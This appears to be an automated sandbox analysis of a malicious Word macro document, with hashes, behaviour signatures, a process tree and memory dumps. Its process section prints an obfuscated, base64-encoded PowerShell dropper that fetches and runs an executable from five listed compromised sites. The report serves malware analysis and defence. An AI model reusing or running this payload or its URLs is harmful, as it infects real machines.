Overview

overview

10

Static

static

8

sample.doc

windows7_x64

10

sample.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    103s
  • max time network
    41s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 21:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sample.doc

  • Size

    171KB

  • MD5

    85e8cf7f6540a5ec489dda61d68b4e47

  • SHA1

    576caaf8dab0632331c58026deff9add882e9244

  • SHA256

    330c445638c69688590588cb2f7c932ef4c5da718b98ea8f341befdcf64218b2

  • SHA512

    0c7c6b94b647800be7588dfc8f7c9a21b54b31728cf51bbbf73076531faeaf4425535d173df0b2cf9ac40824cbed168be0f23cfce0a5629cce21932b64f331a8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://focalaudiodesign.com/wp-content/3j_g08k2_6s/
exe.dropper

http://www.microcommindia.com/css/9wu_sjp_rvn/
exe.dropper

http://mikeflavell.com/cgi-bin/akmt_4ns_bau/
exe.dropper

http://mosdk.com/img/bg/css/ymiu_ow_uiatk/
exe.dropper

https://overcreative.com/css/fgn_al1_gav0/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:548
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABaAFUAVgBZAFoAeAB1AGoAPQAnAE0ARwBSAEkATgB4AGUAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAFUAYABSAGAAaQBUAHkAYABwAHIATwB0AE8AYwBvAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABTAFoAUgBEAFEAaQBuAGkAIAA9ACAAJwA0ADkAOAAnADsAJABNAFAAWABRAFEAcABwAGQAPQAnAEIASgBTAE0AWgBjAHgAdgAnADsAJABPAFMASgBDAFgAcQBrAGsAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFMAWgBSAEQAUQBpAG4AaQArACcALgBlAHgAZQAnADsAJABQAFMATQBIAE8AbQB5AGUAPQAnAEoATABUAFkAUwB2AGMAdwAnADsAJABIAFoARgBLAE4AZQBsAGYAPQAuACgAJwBuACcAKwAnAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4ARQB0AC4AdwBlAGIAQwBMAEkARQBuAFQAOwAkAE8ATgBPAEIAQgBqAGkAYwA9ACcAaAB0AHQAcAA6AC8ALwBmAG8AYwBhAGwAYQB1AGQAaQBvAGQAZQBzAGkAZwBuAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMwBqAF8AZwAwADgAawAyAF8ANgBzAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAGMAbwBtAG0AaQBuAGQAaQBhAC4AYwBvAG0ALwBjAHMAcwAvADkAdwB1AF8AcwBqAHAAXwByAHYAbgAvACoAaAB0AHQAcAA6AC8ALwBtAGkAawBlAGYAbABhAHYAZQBsAGwALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBhAGsAbQB0AF8ANABuAHMAXwBiAGEAdQAvACoAaAB0AHQAcAA6AC8ALwBtAG8AcwBkAGsALgBjAG8AbQAvAGkAbQBnAC8AYgBnAC8AYwBzAHMALwB5AG0AaQB1AF8AbwB3AF8AdQBpAGEAdABrAC8AKgBoAHQAdABwAHMAOgAvAC8AbwB2AGUAcgBjAHIAZQBhAHQAaQB2AGUALgBjAG8AbQAvAGMAcwBzAC8AZgBnAG4AXwBhAGwAMQBfAGcAYQB2ADAALwAnAC4AIgBzAHAAYABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEMARQBGAEoASwB1AHkAaQA9ACcAVABVAFMARwBRAGMAYgBpACcAOwBmAG8AcgBlAGEAYwBoACgAJABFAFoAQgBBAEkAdwB3AHAAIABpAG4AIAAkAE8ATgBPAEIAQgBqAGkAYwApAHsAdAByAHkAewAkAEgAWgBGAEsATgBlAGwAZgAuACIARABvAHcAbgBsAE8AYABBAGAARABmAEkAbABlACIAKAAkAEUAWgBCAEEASQB3AHcAcAAsACAAJABPAFMASgBDAFgAcQBrAGsAKQA7ACQAWgBGAEIASwBSAG0AbQBmAD0AJwBEAEMAUQBYAEsAYwB5AHUAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABPAFMASgBDAFgAcQBrAGsAKQAuACIAbABlAE4AYABnAHQAaAAiACAALQBnAGUAIAAzADMAMwA3ADkAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAcgBFAGAAQQBgAFQARQAiACgAJABPAFMASgBDAFgAcQBrAGsAKQA7ACQARwBJAFIASQBGAHMAZQBqAD0AJwBEAFYAUQBYAEsAYgBkAHIAJwA7AGIAcgBlAGEAawA7ACQAUwBNAFQAVwBFAGMAdQBmAD0AJwBXAEsAUABJAFYAbABjAGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASABXAFYAUgBNAGMAYgBjAD0AJwBNAEYARwBWAEcAbAB1AGMAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:656

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/548-67-0x0000000000000000-mapping.dmp
      Download
    • memory/656-61-0x000007FEFBB31000-0x000007FEFBB33000-memory.dmp
      Filesize

      8KB

      Download
    • memory/656-66-0x000000000286B000-0x000000000288A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/656-65-0x000000001B700000-0x000000001B9FF000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/656-63-0x000007FEF1F10000-0x000007FEF2A6D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/656-64-0x0000000002864000-0x0000000002867000-memory.dmp
      Filesize

      12KB

      Download
    • memory/656-62-0x000007FEF37D0000-0x000007FEF41F3000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/2000-57-0x0000000075221000-0x0000000075223000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2000-60-0x0000000000599000-0x000000000059D000-memory.dmp
      Filesize

      16KB

      Download
    • memory/2000-59-0x0000000000599000-0x000000000059D000-memory.dmp
      Filesize

      16KB

      Download
    • memory/2000-58-0x000000007113D000-0x0000000071148000-memory.dmp
      Filesize

      44KB

      Download
    • memory/2000-54-0x00000000726D1000-0x00000000726D4000-memory.dmp
      Filesize

      12KB

      Download
    • memory/2000-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2000-55-0x0000000070151000-0x0000000070153000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2000-69-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download